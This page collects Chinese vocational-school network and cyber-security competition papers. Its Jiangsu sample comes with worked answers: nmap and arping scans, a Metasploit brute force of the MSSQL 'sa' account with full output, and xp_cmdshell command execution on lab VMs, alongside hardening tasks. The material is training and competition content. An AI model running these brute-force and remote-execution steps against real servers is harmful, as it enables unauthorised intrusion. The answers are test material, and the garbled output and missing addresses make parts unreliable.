全国职业院校技能大赛中职组“网络空间安全”赛卷

合集下载

2022年全国职业院校技能大赛网络搭建与应用竞赛试题(第10套)

2022年全国职业院校技能大赛网络搭建与应用竞赛试题(第10套)

2021年全国职业院校技能大赛网络搭建与应用竞赛试题(第10套)2022年全国职业院校技能大赛网络搭建与应用竞赛〔总分1000分〕赛题说明一、竞赛内容分布“网络搭建与应用〞竞赛共分二个局部,其中:第一局部:网络搭建及平安部署工程,占总分的比例为45%;第二局部:效劳器配置及应用工程,占总分的比例为55%;二、竞赛考前须知〔1〕禁止携带和使用移动存储设备、计算器、通信工具及参考资料。

〔2〕请根据大赛所提供的比赛环境,检查所列的硬件设备、软件清单、材料清单是否齐全,计算机设备是否能正常使用。

〔3〕本试卷共有两个局部。

请选手仔细阅读比赛试卷,按照试卷要求完成各项操作。

〔4〕操作过程中,需要及时保存设备配置。

比赛结束后,所有设备保持运行状态,不要拆、动硬件连接。

〔5〕比赛完成后,比赛设备、软件和赛题请保存在座位上,禁止将比赛所用的所有物品〔包括试卷和草纸〕带离赛场。

〔6〕所有需要提交的文档均放置在桌面的PC1“比赛文档〞文件夹中,禁止在纸质资料上填写与竞赛无关的标记,如违反规定,可视为0分。

〔7〕裁判以各参赛队提交的竞赛结果文档为主要评分依据。

所有提交的文档必须按照赛题所规定的命名规那么命名,文档中有对应题目的小标题,截图有截图的简要说明,否那么按无效内容处理。

〔8〕与比赛相关的工具软件放置在D盘的tools文件夹中。

三、竞赛工程背景及网络拓扑1. 工程描述以下图是某集团公司在天津设有总公司,在上海设有分公司,为了实现信息交流和资源共享,需要构建一个跨越两地的集团网络。

总公司采用节点和链路冗余的网络架构及双出口的网络接入模式,采用防火墙接入互联网络,保护内网用户资源,采用路由器接入城域网专用链路来传输业务数据流。

总公司为了平安管理每个部门的用户,使用VLAN技术将每个部门的用户划分到不同的VLAN中。

上海分公司采用路由器接入互联网络和城域网专用线路,分公司的内网用户接入采用无线接入方式访问网络资源。

为了保障总公司与分公司业务数据传输的高可用性,租用广域网专用线路ISP为主链路,采用基于IPSEC-VPN技术作为因特网链路的备份链路,以实现业务流量的高可用性。

2021年中职组网络搭建与应用赛项公开赛卷02《技能要求》-10

2021年中职组网络搭建与应用赛项公开赛卷02《技能要求》-10

2021年全国职业院校技能大赛网络搭建与应用赛项公开赛卷(五)技能要求(总分1000分)网络搭建与应用赛项执委会及专家组2021年03月21日竞赛说明一、竞赛内容分布“网络搭建与应用”竞赛共分三个部分,其中:第一部分:网络搭建及安全部署项目(500分)第二部分:服务器配置及应用项目(480分)第三部分:职业规范与素养( 20分)二、竞赛注意事项1.禁止携带和使用移动存储设备、计算器、通信工具及参考资料。

2.请根据大赛所提供的比赛环境,检查所列的硬件设备、软件清单、材料清单是否齐全,计算机设备是否能正常使用。

3.请选手仔细阅读比赛试卷,按照试卷要求完成各项操作。

4.操作过程中,需要及时保存设备配置。

5.比赛结束后,所有设备保持运行状态,评判以最后的硬件连接和配置为最终结果。

6.比赛完成后,比赛设备、软件和赛题请保留在座位上,禁止将比赛所用的所有物品(包括试卷和草纸)带离赛场。

7.禁止在纸质资料、比赛设备、上填写任何与竞赛无关的标记,如违反规定,可视为0分。

8.与比赛相关的工具软件放置在每台主机的D盘soft文件夹中,三种报告单模板放在PC1电脑D:\soft文件夹中。

项目简介:某集团公司原在北京建立了总公司,后在成都建立了分公司,又在广东设立了一个办事处。

集团设有营销、产品、法务、财务、人力 5个部门,统一进行IP及业务资源的规划和分配,全网采用OSPF和BGP 路由协议进行互联互通。

春回大地,万象更新,站在“两个一百年”历史的交汇点,上半年公司规模依然保持快速发展,业务数据量和公司访问量增长巨大,努力开创新局面,以高质量业绩向党献礼。

为了更好管理数据,提供服务,集团决定在北京建立两个数据中心及业务服务平台、在贵州建立异地灾备数据中心,以达到快速、可靠交换数据,以及增强业务部署弹性的目的,初步完成向两地三中心整体战略架构演进,更好的服务于公司客户。

集团、分公司及广东办事处的网络结构详见“网络环境”拓扑图。

2018年全国网络空间安全赛卷及评分标准(含一阶段答案)

2018年全国网络空间安全赛卷及评分标准(含一阶段答案)

2018年全国职业院校技能大赛中职组“网络空间安全”正式赛卷一、竞赛阶段二、拓扑图PC机环境:物理机:Windows7;虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:toor),安装工具集:Backtrack5,安装开发环境:Python3;虚拟机2:Kali(用户名:root;密码:toor);虚拟机3:WindowsXP(用户名:administrator;密码:123456)。

三、竞赛任务书(一)第一阶段任务书(700分)任务1. MSSQL数据库渗透测试(100分)任务环境说明:✓服务器场景:server2003(用户名:administrator;密码:空)✓服务器场景操作系统:Windows server20031.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景server2003所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的1433、3306、80端口。

并将该操作使用的命令中必须要使用的字符串作为FLAG提交;(10分)2.通过本地PC中渗透测试平台BT5对服务器场景server2003进行系统服务及版本扫描渗透测试,并将该操作显示结果中数据库服务对应的服务端口信息作为FLAG提交;(10分)3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用search命令,并将扫描弱口令模块的名称作为FLAG提交;(10分)4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);(10分)5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;(10分)6.在msf模块中指定密码字典,字典路径为/root/2.txt爆破获取密码并将得到的密码作为FLAG提交;(14分)7.在msf模块中切换新的渗透模块,对服务器场景server2003进行数据库服务扩展存储过程进行利用,将调用该模块的命令作为FLAG提交;(14分)8.在上一题的基础上,使用第6题获取到的密码并进行提权,同时使用show options命令查看需要的配置,并配置CMD参数来查看系统用户,将配置的命令作为FLAG提交;(14分)9.在利用msf模块获取系统权限并查看目标系统的异常(黑客)用户,并将该用户作为FLAG提交。

2021年中职组网络搭建与应用赛项公开赛卷06《评分标准》-10

2021年中职组网络搭建与应用赛项公开赛卷06《评分标准》-10

2021年全国职业院校技能大赛网络搭建与应用竞赛公开赛卷(五)评分标准网络搭建与应用赛项执委会及专家组2021年03月21日0/ 13网络搭建及安全部署项目(500分)1/ 132/ 133/ 13服务器配置及应用项目(480分)一、云实训平台上基础设置与虚拟主机创建(150分)(一)云平台基础设置(50分)1.创建网络(全部正确得30分,不正确的0分)2.创建硬盘(全部正确得20分,不正确的0分)(二)创建虚拟主机(100分)1.生成虚拟主机(全部正确得80分,不正确的0分)2.设置虚拟机IP地址(全部正确得20分,不正确的0分)二、Windows服务器配置(165分)(一)域控制器配置1.所有虚拟机的IP设置(全部正确得满分,不正确的0分)2.配置Windows-1为域控制器,设置DNS服务(全部正确得满分,不正确的0分)4/ 133.把其他Windows主机加入到域(全部正确得满分,不正确的0分)4.创建组织单位和安全组(全部正确得满分,不正确的0分)5.配置“文档”文件夹重定向(全部正确得满分,不正确的0分)6.所有用户使用漫游用户配置文件(全部正确得满分,不正确的0分)7.设置组策略,让域中主机自动信任Windows-4根证书颁发机构。

(全部正确得满分,不正确的0分)8.设置组策略,让域中主机之间通信采用IPSec安全连接,但域控制器和网关除外;采用计算机证书验证,使用组策略将证书分发到客户端计算机。

(全部正确得满分,不正确的0分)9.配置Windows-2为林的第二棵域树根(全部正确得满分,不正确的0分)10.配置Windows-3为的子域(全部正确得满分,不正确的0分)11.配置Windows-4为证书服务器(全部正确得满分,不正确的0分)(二)Web服务配置1.设置Windows-7为web站点(全部正确得满分,不正确的0分)2.web站点同时支持dotnet CLR v2.0和dotnet CLR v4.0(全部正确得满分,不正确的0分)3.web站点目录和内容设置(全部正确得满分,不正确的0分)5/ 134.客户端访问网站,客户端必需有证书(全部正确得满分,不正确的0分)(三)DFS服务器配置1.在Windows-4的C分区划分2GB的空间,创建NTFS分区(全部正确得满分,不正确的0分)2.配置Windows-4为DFS服务器,实现Windows-5和实现Windows-6文件夹的同步(全部正确得满分,不正确的0分)3.配置Windows-5的端口(全部正确得满分,不正确的0分)(四)WDS服务配置1.配置Windows-5和Windows-6为DHCP服务器,实现故障转移(全部正确得满分,不正确的0分)2.DHCP的设置(全部正确得满分,不正确的0分)3.在Windows-5上安装WDS,部署安装Windows Server 2019 Datacenter(全部正确得满分,不正确的0分)(五)NLB服务器配置6/ 131.配置Windows-5和Windows-6为NLB服务器(全部正确得满分,不正确的0分)2.配置群集(全部正确得满分,不正确的0分)3.配置Windows-5为web服务器(全部正确得满分,不正确的0分)4.配置共享网页文件、共享网站配置文件和网站日志文件(全部正确得满分,不正确的0分)5.使用W3C记录日志(全部正确得满分,不正确的0分)6.网站只允许使用域名SSL加密访问(全部正确得满分,不正确的0分)7.配置Windows-6为web服务器,采用共享windows-5配置的方式,导入Windows-5证书(全部正确得满分,不正确的0分)(六)故障转移群集配置1.在Windows-7上添加4块5G硬盘(全部正确得满分,不正确的0分)2.在Windows-7上安装iSCSI目标服务器和存储多路径(全部正确得满分,不正确的0分)3.在Windows-8和Windows-9上连接Windows-7的虚拟磁盘Quorum和Files(全部正确得满分,不正确的0分)4.配置Windows-8和Windows-9为故障转移群集(全部正确得满分,不正确的0分)5.在Windows-8上创建群集(全部正确得满分,不正确的0分)7/ 136.在Windows-9上配置文件服务器角色(全部正确得满分,不正确的0分)(七)虚拟化配置1.在windows-2安装docker(全部正确得满分,不正确的0分)2.导入NanoServer镜像(全部正确得满分,不正确的0分)3.创建名称为web的容器,并进行映射(全部正确得满分,不正确的0分)三、Linux服务器配置(165分)(一)DNS服务和CA服务配置1.所有虚拟机的IP设置(全部正确得满分,不正确的0分)2.所有主机名称的设置(全部正确得满分,不正确的0分)3.Linux服务器的时区设置(全部正确得满分,不正确的0分)4.Linux服务器的防火墙设置(全部正确得满分,不正确的0分)8/ 135.时间同步服务设置(全部正确得满分,不正确的0分)6.DNS服务器设置(全部正确得满分,不正确的0分)7.所有Linux的root用户使用完全合格域名免密码ssh登录到其他Linux主机(全部正确得满分,不正确的0分)8.配置Linux-1为CA服务器(全部正确得满分,不正确的0分)(二)链路聚合配置1.在Linux-3和Linux-4上配置链路聚合(全部正确得满分,不正确的0分)(三)PXE服务配置1.配置Linux-2为DHCP服务器(全部正确得满分,不正确的0分)2.配置Linux-2为TFTP服务器(全部正确得满分,不正确的0分)3.配置Linux-2为apache服务器为PXE客户端提供软件包(全部正确得满分,不正确的0分)(四)NIS服务配置1.配置Linux-1为KDC服务器(全部正确得满分,不正确的0分)9/ 132.在Linux-3上创建用户(全部正确得满分,不正确的0分)3.配置Linux-3为NFS服务器(全部正确得满分,不正确的0分)4.在Linux-4上,设置用户的密码策略(全部正确得满分,不正确的0分)5.配置Linux-4为NFS客户端(全部正确得满分,不正确的0分)6.配置Linux-3为NIS服务器(全部正确得满分,不正确的0分)7.配置Linux-4为NIS客户端(全部正确得满分,不正确的0分)(五)高可靠性配置1.配置Linux-5为iSCSI目标服务器,添加硬盘(全部正确得满分,不正确的0分)2.配置Linux-6和Linux7为iSCSI客户端(全部正确得满分,不正确的0分)3.配置Linux-6和Linux-7为集群服务器(全部正确得满分,不正确的0分)10/ 13(六)LNMT服务配置1.配置Linux-8为Mariadb服务器(全部正确得满分,不正确的0分)2.配置Linux-9为Mariadb客户端(全部正确得满分,不正确的0分)3.修改表userinfo的结构(全部正确得满分,不正确的0分)4.把物理机d:\soft\mysql.txt中的内容导入到userinfo表中(全部正确得满分,不正确的0分)5.导出表记录(全部正确得满分,不正确的0分)6.备份数据库设置(全部正确得满分,不正确的0分)7.配置Linux-3为Tomcat服务器(全部正确得满分,不正确的0分)8.配置Linux-4为Tomcat服务器(全部正确得满分,不正确的0分)9.配置Linux-8为nginx服务器(全部正确得满分,不正确的0分)10.利用nginx反向代理,实现Linux-3和Linux-4的两个Tomcat负载均衡(全部正确得满分,不正确的0分)(七)虚拟化配置1.在Linux-9上安装docker(全部正确得满分,不正确的0分)11/ 132.导入centos镜像(全部正确得满分,不正确的0分)3.创建名称为apache的容器(全部正确得满分,不正确的0分)职业规范与素养(20分)一、整理赛位,工具、设备归位,保持赛后整洁有序;(2分)二、无因选手原因导致设备损坏;(3分)三、恢复调试现场,保证网络和系统安全运行。

全国职业院校技能大赛高职组计算机网络组建及安全维护竞赛样题

全国职业院校技能大赛高职组计算机网络组建及安全维护竞赛样题

2012年全国高职院校技能大赛“计算机网络组建与安全维护”项目竞赛规程一、竞赛项目名称计算机网络组建与安全维护二、竞赛目的适应网络产业快速发展及“三网融合”、“物联网”的趋势,体现绿色节能理念,促进网络工程项目及产业前沿技术在高职院校中的教学应用,引导高职教育计算机网络专业的教学改革方向,优化课程设置;深化校企合作,推进产学结合人才培养模式改革;促进高职相应专业学生实训实习与就业。

通过竞赛,检验参赛选手在模拟真实的工作环境与条件下实现对网络组建与安全维护的实施能力,软件安装(或固件升级)能力,设备调试能力,以及网络构架设计改进的能力,包括各种服务器的安装与配置,现场问题的分析与处理、团队协作和创新能力、质量管理与成本控制、安全、环保等意识;实现,引导高职院校关注网络构建与安全维护的高速发展趋势与技术应用方向,指导和推动计算机应用专业开展教学改革,加快计算机应用专业高素质技能型人才的培养,适应国家产业结构调整和产业发展对计算机应用技术人才的需求,增强技能型人才的就业竞争力。

三、竞赛方式和内容(一)竞赛方式比赛采用团队方式进行,每支参赛队由3名选手组成,其中队长1名,并可配2名指导教师。

参赛选手须为2011年同校在籍高职学生,男女不限。

比赛期间,禁止参赛队员在比赛规定时间内接受指导教师指导。

赛场开放,允许观众在不影响选手比赛的前提下现场参观和体验。

(二)竞赛方案企业网络搭建及应用(3人团体项目)利用大赛提供的4台计算机、3台路由器、3台三层交换机、1台安全产品、按大赛要求组建网络。

比赛时间为4.5个小时,连续进行。

网络线缆制作与连接、服务器的安装与配置、网络设备调试、网络测试验收、清洁整理等时间计算在内。

参赛队根据给定竞赛任务,按照大赛组委会提供的竞赛题目要求,在规定时间和指定场地内,根据规定的网络模型和技术要求,完成设备连接,完成配置、验收测试。

参赛选手利用软硬件环境组建星型网络,对网络进行配置;安装Windows和Linux操作系统,并按比赛要求进行相应设置。

江苏省2020年度中职组网络空间安全赛项样题及答案(供参考)

江苏省2020年度中职组网络空间安全赛项样题及答案(供参考)

2018年度全国职业技能大赛中职组“网络空间安全”赛项江苏省竞赛任务书(样题)一、竞赛时间9:00-12:00,共计3小时。

二、竞赛阶段简介三、竞赛任务书内容(一)拓扑图(二)第一阶段任务书任务1.ARP扫描渗透测试任务环境说明:✓服务器场景:CentOS5.5✓服务器场景操作系统:CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;Arping –c 52.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;Arping –c 5root@kali:~# arping -c 5ARPING from eth0Unicast reply from [00:0C:29:62:80:73] 1.017msUnicast reply from [00:0C:29:62:80:73] 0.638msUnicast reply from [00:0C:29:62:80:73] 1.051msUnicast reply from [00:0C:29:62:80:73] 1.590msUnicast reply from [00:0C:29:62:80:73] 1.051msSent 5 probes (1 broadcast(s))Received 5 response(s)Flag:53.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;msf > use auxiliary/scanner/discovery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;msf > use auxiliary/scanner/discovery/arp_sweepmsf auxiliary(arp_sweep) > run[*] appears to be up (VMware, Inc.).[*] appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:completed5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;msf auxiliary(arp_sweep) > run[*] appears to be up (VMware, Inc.).[*] appears to be up (VMware, Inc.).[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag:appears6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;Flag:exploit or run任务2.操作系统及应用程序扫描渗透测试任务环境说明:✓服务器场景:CentOS5.5✓服务器场景操作系统:CentOS5.51.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap –n –Sp2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;root@kali:~# nmap -n -sPStarting Nmap 7.40 ( ) at 2017-12-10 19:59 ESTNmap scan report forHost is up (0.00069s latency).Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds Flag:up3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~# nmap -n -AStarting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report forHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 msOS and Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:Nmap –n –A4.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;root@kali:~# nmap -n -AStarting Nmap 7.40 ( ) at 2017-12-10 20:11 ESTNmap scan report forHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey:| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 msOS and Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:seconds5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;root@kali:~# nmap -OStarting Nmap 7.40 ( ) at 2017-12-10 20:13 ESTNmap scan report forHost is up (0.00044s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbindMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 -Network Distance: 1 hopOS detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds Flag:Nmap –O6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Flag:Nmap –sV7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;root@kali:~# nmap -sVStarting Nmap 7.40 ( ) at 2017-12-10 20:17 ESTNmap scan report forHost is up (0.00014s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 4.3 (protocol 2.0)111/tcp open rpcbind 2 (RPC #100000)MAC Address: 00:0C:29:62:80:73 (VMware)Service detection performed. Please report any incorrect results at / .Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds Flag:OpenSSH 4.3任务3.Web应用程序文件包含安全攻防任务环境说明:✓服务器场景名称:WebServ2003✓服务器场景安全操作系统:Microsoft Windows2003 Server✓服务器场景安装中间件:Apache2.2;✓服务器场景安装Web开发环境:Php6;✓服务器场景安装数据库:Microsoft SqlServer2000;✓服务器场景安装文本编辑器:EditPlus;1.访问WebServ2003服务器场景,"/"->"Display Uploaded's FileContent",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;2.对该任务题目1页面注入点进行渗透测试,通过,并将注入语句作为Flag提交;3.对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;4.通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;5.进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);6.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;任务4.数据库安全加固任务环境说明:✓服务器场景名称:WebServ2003✓服务器场景安全操作系统:Microsoft Windows2003 Server✓服务器场景安装中间件:Apache2.2;✓服务器场景安装Web开发环境:Php6;✓服务器场景安装数据库:Microsoft SqlServer2000;✓服务器场景安装文本编辑器:EditPlus;1.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;2.对服务器场景WebServ2003安装补丁,使其中的数据库MicrosoftSqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交;C:\Documents and Settings\Administrator>netstat -anActive ConnectionsProto Local Address Foreign Address State TCP LISTENINGTCP LISTENINGTCP LISTENINGTCP LISTENINGTCP LISTENINGUDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*UDP *:*Flag:LISTENING3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;msf > use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > run[*] - SQL Server information for[+] - ServerName = SERVER[+] - InstanceName = MSSQLSERVER[+] - IsClustered = No[+] - Version =[+] - tcp = 1433[+] - np = \\SERVER\pipe\sql\query[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交;msf > use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > set username samsf auxiliary(mssql_login) > set pass_file/usr/share/wordlists/metasploit/password.lstmsf auxiliary(mssql_login) > run[*] - - MSSQL - Starting authentication scanner.[!] - No active DB -- Credential data will not be saved![-] - - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1000s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:100s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1022 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:10s (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:10sne1 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:11111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:111111 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )[-] - - LOGIN FAILED: WORKSTATION\sa:112233 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1212 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:121212 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1213 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1214 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1225 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123123 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:123321 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:1234 (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:12345 (Incorrect: ) [+] - - LOGIN SUCCESSFUL: WORKSTATION\sa:123456[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedFlag: completed5.通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用,删除WebServ2003服务器场景C:\1.txt,并将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag 提交;msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhostmsf auxiliary(mssql_exec) > set password 123456msf auxiliary(mssql_exec) > set cmd cmd.exe /c del "C:\\1.txt" msf auxiliary(mssql_exec) > run[*] - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt' output------[*] Auxiliary module execution completedFlag: [*] - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt'6.通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC2中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交:W7.验证在WebServ2003的数据库服务进行安全加固后,再次通过PC2中渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令进行暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果的从上向下数第3行内容作为Flag提交;msf auxiliary(mssql_login) > run[*] - - MSSQL - Starting authentication scanner.[!] - No active DB -- Credential data will not be saved![-] - - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: ) [-] - - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* 